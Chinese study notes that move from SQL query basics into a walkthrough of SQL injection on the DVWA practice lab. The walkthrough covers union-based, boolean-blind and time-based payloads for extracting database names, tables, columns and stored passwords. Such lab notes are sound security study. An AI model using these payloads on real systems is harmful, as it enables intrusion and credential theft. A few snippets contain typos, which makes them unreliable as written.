SELECT <目标列名序列> -- 需要哪些列
FROM <表名> [JOIN <表名> ON <连接条件>] -- 来自哪些表
[WHERE <行选择条件>] -- 根据什么条件
[GROUP BY <分组依据列>]
[HAVING <组选择条件>]
[ORDER BY <排列依据列>]
SELECT * FROM Student
SELECT 子句用于指定输出的字段
FROM 子句用于指定数据的来源
WHERE 子句用于指定数据的行选择条件
GROUP BY 子句用于对检索到的记录进行分组
HAVING 子句用于指定对分组后结果的选择条件
ORDER BY 子句用于对查询的结果进行排序
查询条件 | 谓词 |
比较 | =, >, >=, <=, <, <>, != |
确定范围 | BETWEEN … AND …, NOT BETWEEN … AND… |
确定集合 | IN, NOT IN |
字符匹配 | LIKE, NOT LIKE |
空值 | IS NULL, IS NOT NULL |
多重条件 | AND, OR |
-- 1. 比较大小--------------------------------------------
SELECT Sname FROM Student WHERE Sdept='计算机系' SELECT Sno, Cno, Grade FROM SC WHERE Grade > 90
-- 2. 确定范围--------------------------------------------
SELECT Cname, Credit, Semester FROM Course WHERE Credit BETWEEN 2 AND 3
-- 等价于
WHERE Credit >= 2 AND Credit <=3
-- 3. 确定集合--------------------------------------------
-- 查询‘计算机系’和‘机电系’学生的学号、姓名和所在系
SELECT Sno, Sname, Sdept FROM Student WHERE Sdept IN ('计算机系', '机电系')
-- 4. 字符串匹配--------------------------------------------
SELECT Sno, Sname, Sdept FROM Student WHERE Sname LIKE '李%'
-- 5. 涉及空值的查询--------------------------------------------
-- 查询还没有考试的学生的学号、相应的课程号
SELECT Sno, Cno FROM SC WHERE Grade IS NULL
-- 6. 多重条件查询--------------------------------------------
-- 查询‘计算机系’有备注的学生的学好、姓名、所在系和备注
SELECT Sno, Sname, Sdept, Memo FROM Student
WHERE Memo IS NOT NULL AND Sdelt = '计算机系'
COUNT(*):统计表中元组的个数
COUNT([DISTINCT] <列名>):统计本列的列值个数,DISTINCT表示去掉重复值后再统计
SUM(<列名>):计算列值的和值(必须是数值类型)
AVG(<列名>):计算列值的平均值(必须是数值类型)
MAX(<列名>):得到列的最大值
MIN(<列名>):得到列的最小值
-- 查询‘计算机系’和‘机电系’的所有学生信息
(SELECT Sno, Sname, Ssex, Sdept
FROM Student WHERE Sdept = '计算机系'
)
UNION
(SELECT Sno, Sname, Ssex, Sdept
FROM Student WHERE Sdept = '机电系'
)
-- 查询同时选修了‘C01’与‘C02’课程的学生学号
(SELECT Sno FROM SC WHERE Cno='C01'
)
INTERSECT
(SELECT Sno FROM SC WHERE Cno='C02'
)
-- 查询选修了‘C01’但没选‘C02’课程的学生的学号
(SELECT Sno FROM SC WHERE Cno = 'C01'
)
EXCEPT
(SELECT Sno FROM SC WHERE Cno='C02'
)
LIMIT子句简介要检索查询返回的行的一部分,请使用LIMIT和OFFSET子句。 以下说明了这些子句的语法:
SELECT
column_list
FROM
table1
ORDER BY column_list
LIMIT row_count OFFSET offset;
函数
substr() 截取数据库某一列字段中的一部分。
database() 返回当前使用的数据库
group_concat()把一列的数据,全部整合到一起
information_schema数据库
COLUMNS 表
存储表中的列信息,包括表有多少列、每个列的类型等。SHOW COLUMNS FROM schemaname.tablename 命令从这个表获取结果。
mysql> SELECT * FROM COLUMNS LIMIT 2,5;
TABLES 表
存储数据库中的表信息(包括视图),包括表属于哪个数据库,表的类型、存储引擎、创建时间等信息。SHOW TABLES FROM XX; 命令从这个表获取结果。
mysql> SELECT * FROM TABLES;
https://cloud.tencent.com/developer/article/1922143
数字型:
url/auth.php?a=1 and 1=1# //正常
url/auth.php?a=1 and 1=2# //错误
字符型:
url/auth.php?a=-1' or 1=1# //正常
1.先用万能密码
1‘ or 1=1#
,简单判断是否存在注入
2.闭合前面的单引号,构造联合注入语句,输入
1'order by 1#
,页面正常,然后输入1'order by 2 #
,依次增加,直到3时出现错误,如图,说明当前表有2列
3.接下来构造联合查询语句确定显示的位置(SQL语句查询之后的回显位置)
1' union select 1,2#
下图可以看出有2个回显
4.接着构造联合查询语句查询当前数据库用户和数据库名,结果会显示在上图对应的位置:
'union select user(),database()#
5.使用information_schema来查询到所有的数据,查询当前数据库中的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
6.获取表中的字段名
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
7.获得字段中的数据
1' union select user,password from users#
这里主要运用到了
information_schema
库, TABLES表里的table_name
表名和COLUMNS的column_name
字段名
在SQL注入中,我们重点关注的表有如下几个,因为主要的时候主要利用这几个表来获取数据:
SCHEMATA:提供了当前mysql数据库中所有数据库的信息,其中SCHEMA_NAME字段保存了所有的数据库名。show
databases的结果取自此表。
TABLES:提供了关于数据库中的表的信息,详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息,其中table_name字段保存了所有列名信息,show tables from schemaname的结果取自此表。
COLUMNS:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息,其中column_name保存了所有的字段信息。show
columns from schemaname.tablename的结果取自此表。
length(),返回长度
ascii(),返回ASCII值
substr(string,a,b),返回string以a开头,长度为b的字符串
count(column_name) 返回指定列的值的数目(NULL 不计入)
常用三种payload:
分别代表闭合语句和注释语句。注释有两种注释方法,#和--
1' and length(database())='1
1' and length(database())=2#
1' and length(database())=3--
1.判断是字符型还是数值型,由下列判断得出是字符型
输入1显示存在
输入1 and 1=1 或 1 and 1=2均显示存在
输入1' and 1=1 #显示存在
输入1'and 1=2 #不存在
SQL源语句:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
2.查数据库前要先判断数据库的长度
依次输入1' and length(database())=x #
(x为大于等于1的整数)
当显示存在时即为数据库长度
发现当x=4时显示存在,故数据库长度为4
3.二分法找数据库名
依次输入1’ and ascii(substr(databse(),1,1))>或<字母的ascii值 # 通过比较输入字母的ascii值的显示正常与否来逐个确定库名
例
输入1' and ascii(substr(database(),1,1))>97 #
显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
输入1' and ascii(substr(database(),1,1))<122 #
显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
输入1' and ascii(substr(database(),1,1))<109 #
显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);
…
重复上述步骤,就可以得到完整的数据库名dvwa
4.找数据库中的表
首先确定数据库中表的数量
1' and (select count (table_name) from information_schema.tables where table_schema=database())=x #
(x为大于等于1的整数)当显示存在时即可判断表的数量
最终当x=2显示存在即表的数量为2
然后确定表的长度
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=x #
(x为大于等于1的整数)当显示存在时即可判断表的长度
当x=9显示存在即表的长度为9
然后同样二分法确定表名
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>或<字母的ascii值 #
通过比较输入字母的ascii值的显示正常与否来逐个确定表名
例
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 #
显示存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 #
显示存在
…
重复上述步骤可得到出两个表名guestbook、users
5.找表中的字段
首先找到字段的数量
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=x #
当显示存在时即为字段数
最后当x=8时显示存在即字段数users字段数为8
然后找字段名
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=x #
当x=7时显示存在即users表的第一个字段为7个字符长度
最后也是二分法确定字段名
字段名出来了,之后就是一个一个爆每个字段的值了
该语句判断数据库个数,当数据库个数等于n页面返回延迟5秒
if((select count(schema_name) from information_schema.schemata)=n,sleep(5),1)
该语句判断数据库内第一个数据库名有多少字符,字符个数等于n页面返回延迟5秒
if((select length(schema_name) from information_schema.schemata limit 0,1)=n,sleep(5),1)
该语句判断第一个库第一个字符是什么,ascii值等于n页面返回延迟5秒
if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))=n,sleep(5),1)
相关函数学习
Length()函数 返回字符串的长度
substr()截取字符串
ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
count(column_name)函数返回指定列的值的数目(NULL 不计入)